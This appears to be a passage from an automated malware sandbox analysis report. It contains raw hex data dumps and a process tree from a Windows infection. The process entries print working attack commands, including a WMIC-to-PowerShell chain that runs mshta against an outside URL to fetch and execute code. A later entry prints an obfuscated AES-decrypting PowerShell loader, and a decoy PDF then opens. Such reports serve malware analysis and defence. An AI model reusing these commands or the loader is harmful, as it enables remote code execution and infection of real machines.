                                          Data Ascii: Oh+'0x8L|Installation DatabaseVeteranChapman Faquir
                                          2024-12-31 09:38:08 UTC16384INData Raw: c7 ea 1f 50 8e 00 3b e5 64 b5 38 d9 64 34 5c 07 4b 81 8b 16 41 b6 a2 61 38 7b 02 57 cc 8b 26 98 e8 7b 4c a2 97 c8 2c c0 2d e1 20 de 01 14 2c 37 0f 5a 15 9b 28 b0 2a 31 82 9a cb 1b cf 5d 8a a1 f7 ea 40 60 c1 a8 27 e6 06 13 07 0e 86 3f f1 22 e7 89 bf 40 fd 96 91 21 07 f6 d4 e8 39 7e 07 ec f8 63 03 95 27 c7 93 3e 96 44 d7 1c 72 7a 57 3f a8 af 9f 8e f4 b9 b4 b9 27 ac d2 4c 5f 84 5a e0 9e 20 72 e0 38 a1 f2 0b e2 a9 cc 53 87 79 fc f9 bd 70 cb 4e 71 7f 1d 4a 22 3f 4f dd c4 50 88 85 91 e4 97 0b 78 40 37 72 50 39 3c 22 12 02 cd ad 86 53 d9 49 9e bf ef 5a f0 15 42 41 3f 96 94 f1 f9 51 22 9f 29 a3 9e 9d f8 15 59 a7 92 79 e3 17 cb 36 da e4 52 0b b7 2f 15 7b 58 1c 10 2a 3f 89 77 4b 3a d6 13 a9 bc 4a f9 02 f9 86 5e bd e8 7a 4e 1b 4d 07 b3 80 ac d7 01 7c 14 eb 09 d4 31
                                          Data Ascii: P;d8d4\KAa8{W&{L,- ,7Z(*1]@`'?"@!9~c'>DrzW?'L_Z r8SypNqJ"?OPx@7rP9<"SIZBA?Q")Yy6R/{X*?wK:J^zNM|1
                                          2024-12-31 09:38:08 UTC16384INData Raw: 5e 40 4a c3 db dd 20 2f 30 46 d7 e2 51 57 7c ef a2 00 eb 84 52 a0 5d 0c 26 31 c9 2f 56 de 4f 01 1f 7f 30 d6 ad a3 7f f6 25 01 0a 01 f3 b4 40 09 de 45 6e be 01 b9 a1 0d 6f 69 3b ae 73 6d 06 6a e4 cb 39 38 ae 78 9a 78 2c 30 70 d9 36 00 42 4f d0 10 af ef e0 fc 91 63 db 8f 17 d2 cd 9f 72 f1 aa d1 d9 99 b3 23 5e 32 90 e1 ea 7b cd 58 78 0d 68 74 62 84 2c e4 a8 be 54 05 ad 71 71 74 bf 4f 66 1c ff 46 6d a7 23 7c 2c dc d9 1c af f7 44 a7 7d cc 32 88 5d ea c6 08 81 b7 cb 5f 29 c6 56 af 9f 39 a2 05 dd bf 85 82 71 b6 05 bd e9 82 26 59 17 b7 7e 6a 95 2a 9d 88 cc 8c 71 da 5d 62 b3 6e f5 bb 29 e3 4b 3d 8e d4 88 f9 f9 00 46 87 ad 19 c9 36 35 d7 24 1e 59 c1 36 53 f3 21 74 ff 62 6b 96 4f 96 94 e4 0c 55 94 99 b2 70 94 4e 33 35 64 91 56 46 06 2d 6a 5c a0 b4 86 a5 e5 91 0d ba
                                          Data Ascii: ^@J /0FQW|R]&1/VO0%@Enoi;smj98xx,0p6BOcr#^2{Xxhtb,TqqtOfFm#|,D}2]_)V9q&Y~j*q]bn)K=F65$Y6S!tbkOUpN35dVF-j\
                                          2024-12-31 09:38:08 UTC16384INData Raw: e9 84 8c 43 97 83 95 59 59 f9 95 4e d8 34 a3 ca cf d5 c6 7d 17 89 73 71 aa 38 69 58 8a 61 53 d8 40 3f d2 b9 8a c2 cc 94 e9 c6 e2 9d ef c1 9b c1 d6 a0 aa 87 9b 16 f6 50 d3 12 1d 3a b1 08 84 15 13 0e 19 47 76 a0 3e 29 bf 0c 5f 1f b0 98 e8 dc e6 45 a8 d9 83 a1 b1 18 a9 25 0d 3a c7 59 ed 01 dc 9d 03 bd 4c e7 57 2f 47 cf a2 7b 89 d2 1a f5 a4 12 56 90 70 28 ad 6a 4c cd 90 0a 49 20 71 a8 3d 96 3a df 0d 08 35 f4 9e b2 85 33 55 7c 92 fc 8d 6b 4f 34 3e ce 0c a0 4c 70 bd 18 ea 0b 3a 45 e0 e4 de 1b 71 2e 13 91 e7 9e cd c7 2b dc 50 8e fa 1f 4b 03 dd 1a 84 9f bf c3 75 1c 32 35 95 e9 4d f3 bc 8e 38 91 0c ea 27 37 8e 72 b9 f2 c5 20 9c 16 21 79 eb 05 bf d4 1c d2 09 90 b6 e6 bd de 90 82 9e 0d f1 84 f5 3a ee 0b 4a a0 1c 2d b0 0e f8 3f f0 22 a1 d1 6b 84 b6 02 2c f4 81 92 a3
                                          Data Ascii: CYYN4}sq8iXaS@?P:Gv>)_E%:YLW/G{Vp(jLI q=:53U|kO4>Lp:Eq.+PKu25M8'7r !y:J-?"k,
                                          2024-12-31 09:38:08 UTC16384INData Raw: f4 4a 79 e8 db 1c 03 f5 d3 d3 c8 76 03 b1 57 3a 35 37 9e 9f c5 81 fb b1 ab 2b 37 8a 6f 04 ce ad ff 9a e4 ff 6c 3f f9 59 37 2a 16 89 af ec 11 ed 3d a2 f3 91 77 4e 16 5e ae 74 2b ee 9c 0c 7d 44 e6 8e ec a5 6a de 1e c7 9b 1d 24 a5 78 95 70 e1 62 41 99 3f e6 b5 da 8d 52 1e e5 c7 8f 79 56 4d 54 07 fa 31 e6 f0 fc b1 d3 dc f6 a5 d6 77 07 b7 e8 83 55 76 8b ed be 68 3d 49 ba a9 93 f4 12 68 c9 d4 ed 75 75 a4 5f d7 cc b8 24 f5 67 e6 36 a7 ed d3 87 1f d4 f2 6b 59 ba d7 5c 3b 9f 74 8f cd a4 dd c3 38 83 9d be 6e 3f c8 1a 4c 40 2d 43 8a d1 7a 2b 69 2d 59 6c 69 b2 6e a6 cd 2b 3b 9c 99 49 ae 51 5d dd f5 a3 d7 cb 96 57 e7 8f b5 66 9b 21 f1 f1 fe bd c9 cb fa 1e 5c 1f a4 9c 75 8f f4 ee 9d 9b 0a 3b 5f 52 64 bb b8 dc e8 69 90 b2 e1 b3 96 ba f3 97 25 5d d6 b3 48 c5 eb 53 c3 6d
                                          Data Ascii: JyvW:57+7ol?Y7*=wN^t+}Dj$xpbA?RyVMT1wUvh=Ihuu_$g6kY\;t8n?L@-Cz+i-Ylin+;IQ]Wf!\u;_Rdi%]HSm
                                          2024-12-31 09:38:08 UTC16384INData Raw: ae b0 e8 92 9b 40 23 a4 a9 d4 2a 11 7c 63 0b 12 38 52 6e f5 24 d9 43 8a 98 24 ec 99 27 b6 97 a7 ca 39 28 10 cd 8d 88 4f 33 99 ce 96 e8 df 91 85 ce 2c 22 14 fe 04 be d2 7a fc 5f 66 9a ef 54 76 4c a2 3e fd 46 87 1b cd 9b d5 66 f6 56 82 a9 f9 0e 9f 7b c1 cc e9 46 8b de bf 25 0f 46 f1 ec 26 1c 3f e7 69 2b 12 6f 83 22 eb 65 9b 9b 88 59 b5 66 08 b3 70 81 6c 39 9f 6b 22 8a 43 07 c6 db e3 64 a6 9d b7 2e 84 0e 89 0d cd d0 61 35 6a da 4d 4e d7 07 7b 59 fa 20 9a e7 c4 21 07 5c 1f 8c 6e c6 44 62 8f 53 27 53 20 de 9b 27 4c e9 11 b6 51 34 08 57 c5 77 a6 f0 49 dd 0f a8 ac db 92 4d fc 67 e7 99 45 9d 22 3c 48 36 e4 9e f9 bd 41 39 2e 8f 48 92 7e 92 78 1c 67 de f1 70 a3 46 96 96 46 47 48 01 7d 55 df 80 8f 45 b0 9b 92 27 4c 0c 3f 8d d7 2f 0f f4 96 53 95 21 84 79 b7 19 b2 85
                                          Data Ascii: @#*|c8Rn$C$'9(O3,"z_fTvL>FfV{F%F&?i+o"eYfpl9k"Cd.a5jMN{Y !\nDbS'S 'LQ4WwIMgE"<H6A9.H~xgpFFGH}UE'L?/S!y



                                          Target ID:0
                                          Start time:04:37:57
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
                                          Imagebase:0x7ff6068b0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:1
                                          Start time:04:37:57
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:04:37:58
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:04:37:58
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:04:38:00
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:04:38:00
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\mshta.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc
                                          Imagebase:0x7ff7e7f30000
                                          File size:14'848 bytes
                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:8
                                          Start time:04:38:02
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:9
                                          Start time:04:38:03
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:04:38:03
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:04:38:06
                                          Start date:31/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"
                                          Imagebase:0x7ff651090000
                                          File size:5'641'176 bytes
                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:12
                                          Start time:04:38:07
                                          Start date:31/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                          Imagebase:0x7ff70df30000
                                          File size:3'581'912 bytes
                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:13
                                          Start time:04:38:08
                                          Start date:31/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                          Imagebase:0x7ff70df30000
                                          File size:3'581'912 bytes
                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false
